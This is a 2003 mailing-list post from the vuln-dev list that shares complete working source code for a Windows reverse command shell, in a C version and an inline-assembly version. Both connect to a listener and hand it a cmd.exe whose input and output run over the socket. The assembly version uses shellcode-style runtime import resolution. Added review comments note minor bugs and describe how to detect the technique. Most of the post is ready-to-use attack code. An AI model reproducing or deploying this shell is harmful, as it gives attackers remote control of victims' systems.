From: NetNinja [netninja@hotmail.kg]
Sent: Friday, February 07, 2003 7:45 AM
To: vuln-dev@securityfocus.com
Subject: Windows reverse Shell #2

Hello folks, Thnx everyone for ur replies. Today i found time to have a careful look at my reverse shell C source code. THe problem that i had was very simple. In my C source i forgot to initilize STARTUPINFO struct to zero. That was the problem. 3APA3A's code did initilize that struct, so big thnx to him. Another thing u have to do is to cast socket handle returned from WSASocket call to ptr type and pass it on to stdInput,stdOutput and stdErr of STARTUPINFO struct. That's it! If anyone is interested in reverse cmd shell for windows i have included both C and inline asm version. so have a look at them.

---- C ---------------

/*
 reverse cmd shell
 Will spit back command shell on ur listening netcat on ur localhost (127.0.0.2) port 55
 set up ur netcat eg. nc -l -p 55 -vv
 Adik (netninja@hotmail.kg)
 http://netninja.to.kg
*/
/* NOTE(review): the code below connects to 127.0.0.1, not 127.0.0.2 as the
 * comment above says; port 55 matches. */

#include   /* header names between angle brackets did not survive the rendering of this post */
#include 
#pragma comment(lib,"ws2_32")

/*
 * Reverse shell, C version.
 *
 * Opens a TCP connection from this process to 127.0.0.1:55 and then starts
 * "cmd" with all three standard handles set to that socket, so whatever is
 * listening on the other end of the connection drives the shell.  No API
 * return value (WSAStartup, WSASocket, connect, CreateProcess) is checked,
 * and WSACleanup is never called; the parent simply exits once the child
 * has been created.
 *
 * Defender's note: the observable artefact of this technique is a cmd.exe
 * child whose hStdInput/hStdOutput/hStdError are a socket handle rather than
 * a console or pipe, created right after the parent made an outbound
 * connection.  Process-creation telemetry that records inherited standard
 * handles, correlated with the parent's network connection, is the natural
 * detection point for both versions in this post.
 */
void main(int argc, char *argv[])
{
    WSADATA wsaData;
    SOCKET hSocket;
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    struct sockaddr_in adik_sin;
    memset(&adik_sin,0,sizeof(adik_sin));
    /* Zeroing STARTUPINFO is the fix the mail above describes: every field
     * the code does not set explicitly must be zero. */
    memset(&si,0,sizeof(si));
    WSAStartup(MAKEWORD(2,0),&wsaData);
    /* NULL is passed for the integer protocol/group/flags parameters; the
     * inline-asm version below pushes 0 for the same slots. */
    hSocket = WSASocket(AF_INET,SOCK_STREAM,NULL,NULL,NULL,NULL);
    adik_sin.sin_family = AF_INET;
    adik_sin.sin_port = htons(55);
    adik_sin.sin_addr.s_addr = inet_addr("127.0.0.1");
    /* Return value ignored: if the connect fails the shell is still started
     * with an unconnected socket as its std handles. */
    connect(hSocket,(struct sockaddr*)&adik_sin,sizeof(adik_sin));
    si.cb = sizeof(si);
    si.dwFlags = STARTF_USESTDHANDLES;
    /* The socket handle itself becomes stdin/stdout/stderr of the child
     * (the second point made in the mail above). */
    si.hStdInput = si.hStdOutput = si.hStdError = (void *)hSocket;
    /* bInheritHandles is true so the child receives the socket handle.
     * `true` is not a keyword in C before C23, so as posted this builds only
     * as C++ or with a bool/true definition in scope. */
    CreateProcess(NULL,"cmd",NULL,NULL,true,NULL,NULL,NULL,&si,&pi);
    /* Parent exits immediately; the child keeps the inherited socket. */
    ExitProcess(0);
}

------[ end C ]--------------

----[ inline ASM ]------

/*
 reverse cmd shell inline asm version
 reverse cmd shell on address 127.0.0.1 port 55
 Adik (netninja@hotmail.kg)
 http://netninja.to.kg
*/

#include   /* header names between angle brackets did not survive the rendering of this post */
#include 
#pragma comment(lib,"ws2_32")

/* Absolute addresses of GetProcAddress (GP) and LoadLibrary (LL), as used by
 * the `call eax` sites below.  These are hard-coded, so the asm version only
 * works on the Windows build they were taken from (presumably the author's);
 * on any other kernel32 layout the first call lands on the wrong code. */
#define GP 0x77E7B332
#define LL 0x77E7D961
/* Stack slots where load_func below stores the resolved function pointers,
 * one dword per name in the string table, in the order the names appear. */
#define CreateProcessA [ebp-8]
#define ExitProcess [ebp-0ch]
#define WSASocketA [ebp-10h]
#define connect [ebp-14h]
#define CMD_STR [ebp-18h]
#define PORT 0x3700 //(htons(55)) here u gotta reverse byte order 0x0037=3700
#define IPADDR 0x0100007F // 7F000001//(inet_addr("127.0.0.1"))

/*
 * Reverse shell, inline-asm version.  Same behaviour as the C version above:
 * TCP connect to 127.0.0.1:55, then CreateProcessA("cmd") with the socket as
 * all three std handles, then ExitProcess(0).  The difference is that the
 * Win32 imports are resolved at run time by walking the string table in
 * `ptr` with LoadLibrary/GetProcAddress, and the structs live at fixed
 * offsets below a frame pointer set up inside the __asm block.
 *
 * The __asm block does its own `push ebp / mov ebp,esp` and never restores
 * ebp; that is only safe because ExitProcess does not return.
 */
void main(int argc, char *argv[])
{
    /* String table: library name followed by its function names; a double
     * NUL ends a library's list, the extra NUL after the last list ends the
     * table, and "cmd" follows as the command line for CreateProcessA. */
    char ptr[] = "kernel32\0CreateProcessA\0ExitProcess\0\0"
                 "ws2_32\0WSASocketA\0connect\0\0\0cmd\0\0\0";
    char *i=ptr;
    WSADATA wsaData;
    WSAStartup(MAKEWORD(2,0),&wsaData); //initialize winsock, this is not done below
    // usually when u inject ur shellcode into remote process
    // socket is already initialized
    __asm {
        mov edi, i
        dec edi                 // edi is pre-decremented; load_lib starts with inc edi
        push ebp
        mov ebp,esp             // new frame; all [ebp-xx] slots below are relative to it
        sub esp,0x20
        mov ecx,ebp
        sub ecx,4h
        push ecx                // saved "next slot" pointer: function pointers go at ecx-4, ecx-8, ...
    load_lib:
        inc edi
        cmp byte ptr[edi],0     // a NUL here means the whole table is exhausted
        je done_loadin
        push edi
        mov eax, LL
        call eax //LoadLibrary("Lib")
        mov [ebp-4],eax //places lib handle into ebp-4
        xor eax,eax
        repne scasb             // advance edi past the library name's NUL
    load_func:
        cmp byte ptr[edi],0     // NUL here means end of this library's function list
        je load_lib
        push edi
        mov ebx, dword ptr[ebp-4] //lib handle
        push ebx
        mov eax, GP
        call eax //GetProcAddress("Function")
        pop ecx
        sub ecx,4
        mov dword ptr[ecx], eax // store the pointer in the next [ebp-8], [ebp-0ch], ... slot
        push ecx
        xor eax,eax
        repne scasb             // advance edi past the function name's NUL
        jmp load_func
    done_loadin:
        xor eax,eax
        inc edi                 // skip the table terminator; edi now points at "cmd"
        mov dword ptr[ebp-18h],edi
        mov ecx,50 //make some space for structs
    push_em:
        push eax                // 50 zero dwords: zero-fills the region used below for
        loop push_em            // sockaddr_in / PROCESS_INFORMATION / STARTUPINFO and
                                // supplies the four trailing zero arguments of WSASocketA
        push 0x1                // type = SOCK_STREAM
        push 0x2                // af = AF_INET
        call WSASocketA
        mov ebx, eax //copies sockethandle returned into ebx //ebp-20h
        mov dword ptr[ebp-40h],0x2 //sockaddr_in
        mov word ptr[ebp-3Eh],PORT
        mov dword ptr[ebp-3Ch],IPADDR
        //mov dword ptr[ebp-40h],process_information
        mov dword ptr[ebp-94h],0x44 //sizeof startupinfo
        mov dword ptr[ebp-68h],0x100 //dwFlags
        mov dword ptr[ebp-5Ch],ebx //stdio
        mov dword ptr[ebp-58h],ebx //stdout
        mov dword ptr[ebp-54h],ebx //stderr
        push 0x10 //sizeof sockaddr_in
        lea edx, dword ptr[ebp-40h]
        push edx //ptr to sockaddr_in
        push ebx //socket handle
        call connect            // result in eax is not checked, as in the C version
        lea edx,dword ptr[ebp-50h]
        push edx //push proc_info
        lea edx,dword ptr[ebp-94h]
        push edx //push ptr to startupinfo
        xor edx,edx
        push edx                // lpCurrentDirectory = NULL
        push edx                // lpEnvironment = NULL
        push edx                // dwCreationFlags = 0
        inc edx //inheritHandles = true
        push edx
        dec edx
        push edx                // lpThreadAttributes = NULL
        push edx                // lpProcessAttributes = NULL
        mov eax,CMD_STR //ptr to "cmd" str
        push eax                // lpCommandLine
        push edx                // lpApplicationName = NULL
        call CreateProcessA
        push edx                // exit code 0
        call ExitProcess
    }
}

----[ end ]------
--
Best regards,
Adik (NetNinja)
mailto:netninja@hotmail.kg